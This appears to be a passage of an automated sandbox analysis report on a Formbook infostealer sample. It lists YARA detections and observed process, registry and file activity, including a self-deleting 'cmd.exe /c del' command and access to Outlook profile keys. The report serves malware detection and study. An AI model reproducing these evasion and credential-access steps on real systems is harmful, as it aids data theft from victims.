          Source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/0@14/9
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 0_2_0041DDA8 GetLastError,FormatMessageA
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 0_2_00408606 GetDiskFreeSpaceA
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 0_2_004137F4 FindResourceA
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_01
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: mp0nMsMroT.exe | Virustotal: Detection: 47%
          Source: mp0nMsMroT.exe | ReversingLabs: Detection: 79%
          Source: unknown | Process created: C:\Users\user\Desktop\mp0nMsMroT.exe 'C:\Users\user\Desktop\mp0nMsMroT.exe'
          Source: unknown | Process created: C:\Users\user\Desktop\mp0nMsMroT.exe 'C:\Users\user\Desktop\mp0nMsMroT.exe'
          Source: unknown | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\mp0nMsMroT.exe'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Process created: C:\Users\user\Desktop\mp0nMsMroT.exe 'C:\Users\user\Desktop\mp0nMsMroT.exe'
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\mp0nMsMroT.exe'
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Binary string: wntdll.pdbUGP source: mp0nMsMroT.exe, 00000001.00000002.232510703.0000000000A90000.00000040.00000001.sdmp, NETSTAT.EXE, 00000005.00000002.451053181.00000000031DF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: mp0nMsMroT.exe, NETSTAT.EXE, 00000005.00000002.451053181.00000000031DF000.00000040.00000001.sdmp

          Data Obfuscation: